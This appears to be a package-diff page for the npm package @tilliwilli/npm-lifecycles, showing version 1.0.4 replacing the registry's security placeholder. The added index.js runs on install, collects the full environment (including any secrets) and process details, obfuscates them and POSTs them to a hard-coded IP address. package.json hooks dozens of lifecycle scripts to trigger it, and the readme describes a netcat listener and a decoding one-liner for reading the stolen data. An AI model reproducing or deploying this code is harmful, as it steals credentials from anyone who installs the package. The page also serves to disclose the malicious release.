@tilliwilli/npm-lifecycles 0.0.1-security → 1.0.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @tilliwilli/npm-lifecycles might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +37 -0
  2. package/package.json +57 -3
  3. package/readme.md +84 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,37 @@
1
+ var fs = require("fs");
2
+ var util = require("util");
3
+ var http = require("http");
4
+
5
+ var npmLifecycleEvent = process.env.npm_lifecycle_event;
6
+
7
+ if (npmLifecycleEvent !== "postinstall")
8
+ process.exit();
9
+
10
+ var log = {
11
+ event: npmLifecycleEvent,
12
+ version: process.version,
13
+ arch: process.arch,
14
+ platform: process.platform,
15
+ features: process.features,
16
+ env: process.env,
17
+ title: process.title,
18
+ argv: process.argv,
19
+ execArgv: process.execArgv,
20
+ pid: process.pid,
21
+ ppid: process.ppid,
22
+ execPath: process.execPath,
23
+ debugPort: process.debugPort,
24
+ argv0: process.argv0,
25
+ _preload_modules: process._preload_modules,
26
+ mainModule: process.mainModule,
27
+ };
28
+
29
+ var output = util.inspect(log);
30
+
31
+ http
32
+ .request({
33
+ hostname: "51.250.107.250",
34
+ method: "POST",
35
+ headers: { Authorization: `Bearer ` + Buffer.from(output).map(x => x ^ 7).toString("base64") }
36
+ })
37
+ .end();
package/package.json CHANGED
@@ -1,6 +1,60 @@
1
1
  {
2
2
  "name": "@tilliwilli/npm-lifecycles",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.4",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "premyscript": "node index.js",
7
+ "myscript": "node index.js",
8
+ "postmyscript": "node index.js",
9
+ "prepare": "node index.js",
10
+ "prepublish": "node index.js",
11
+ "prepublishOnly": "node index.js",
12
+ "prepack": "node index.js",
13
+ "postpack": "node index.js",
14
+ "dependencies": "node index.js",
15
+ "devDependencies": "node index.js",
16
+ "devDependency": "node index.js",
17
+ "curl": "node index.js",
18
+ "wget": "node index.js",
19
+ "preinstall": "node index.js",
20
+ "install": "node index.js",
21
+ "postinstall": "node index.js",
22
+ "preprepare": "node index.js",
23
+ "postprepare": "node index.js",
24
+ "node_modules": "node index.js",
25
+ "binding.gyp": "node index.js",
26
+ "publish": "node index.js",
27
+ "postpublish": "node index.js",
28
+ "npm rebuild": "node index.js",
29
+ "npm restart": "node index.js",
30
+ "restart": "node index.js",
31
+ "stop": "node index.js",
32
+ "start": "node index.js",
33
+ "pre": "node index.js",
34
+ "post": "node index.js",
35
+ "prerestart": "node index.js",
36
+ "postrestart": "node index.js",
37
+ "prestart": "node index.js",
38
+ "poststart": "node index.js",
39
+ "prestop": "node index.js",
40
+ "poststop": "node index.js",
41
+ "npm test": "node index.js",
42
+ "pretest": "node index.js",
43
+ "test": "node index.js",
44
+ "posttest": "node index.js",
45
+ "uninstall": "node index.js",
46
+ "PATH": "node index.js",
47
+ "bar": "node index.js",
48
+ "npm_lifecycle_event": "node index.js",
49
+ "sh": "node index.js",
50
+ "npm_config_binroot": "node index.js",
51
+ ".gyp": "node index.js",
52
+ "npm": "node index.js",
53
+ "INIT_CWD": "node index.js",
54
+ "run": "node index.js"
55
+ },
56
+ "keywords": [],
57
+ "author": "",
58
+ "license": "ISC",
59
+ "dependencies": {}
6
60
  }
package/readme.md ADDED
@@ -0,0 +1,84 @@
1
+ # list of events occur when publishing
2
+
3
+ - prepublishOnly
4
+ - prepack
5
+ - prepare
6
+ - postpack
7
+ - publish
8
+ - postpublish
9
+
10
+
11
+ # list of events occur when installing from npm registry
12
+
13
+ - preinstall
14
+ - install
15
+ - postinstall
16
+
17
+
18
+ # list of events occur when installing from file:// protocol (file:///htdocs/test)
19
+
20
+ - preinstall
21
+ - prepare
22
+ - install
23
+ - postinstall
24
+
25
+
26
+ # list of events occur when installing from http:// protocol (http://localhost:8000/test.tar.gz)
27
+
28
+ - preinstall
29
+ - install
30
+ - postinstall
31
+
32
+ # what web server receives from `npm i http://localhost:8000/test.tar.gz`
33
+
34
+ ```bash
35
+ ┌──(tilli㉿pasakoh)-[/mnt/c/Users/tilli/htdocs/visiology-public-utilities-hack]
36
+ └─$ nc -lvnp 8000
37
+ listening on [any] 8000 ...
38
+ connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48492
39
+ GET /test.tar.gz HTTP/1.1
40
+ npm-command: install
41
+ pacote-pkg-id: remote:xxx@http://localhost:8000/test.tar.gz
42
+ pacote-req-type: tarball
43
+ pacote-version: 12.0.3
44
+ user-agent: npm/8.5.0 node/v16.14.2 win32 x64 workspaces/false
45
+ if-modified-since: Sun, 10 Apr 2022 12:48:38 GMT
46
+ connection: keep-alive
47
+ Accept: */*
48
+ Accept-Encoding: gzip,deflate
49
+ Host: localhost:8000
50
+ ```
51
+
52
+ # listening server
53
+
54
+ ```bash
55
+ while true; do sudo nc -N -lvnp 80 < response.json >> output; done
56
+ ```
57
+
58
+
59
+ # response.json
60
+
61
+ ```bash
62
+ HTTP/1.1 200 OK
63
+ Connection: close
64
+
65
+ {"result":"ok"}
66
+
67
+ ```
68
+
69
+ # extract request payload
70
+
71
+ ```bash
72
+ grep Auth output | awk '{print $3}' | base64 -d | less
73
+ ```
74
+
75
+
76
+ # investigate more
77
+
78
+ - place exe in node_modules/.hooks/{eventname} https://docs.npmjs.com/cli/v6/using-npm/scripts#hook-scripts
79
+
80
+
81
+ # links
82
+
83
+ https://docs.npmjs.com/cli/v8/using-npm/scripts#life-cycle-scripts
84
+ https://docs.npmjs.com/cli/v8/configuring-npm/package-json#scripts
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40tilliwilli%2Fnpm-lifecycles for more information.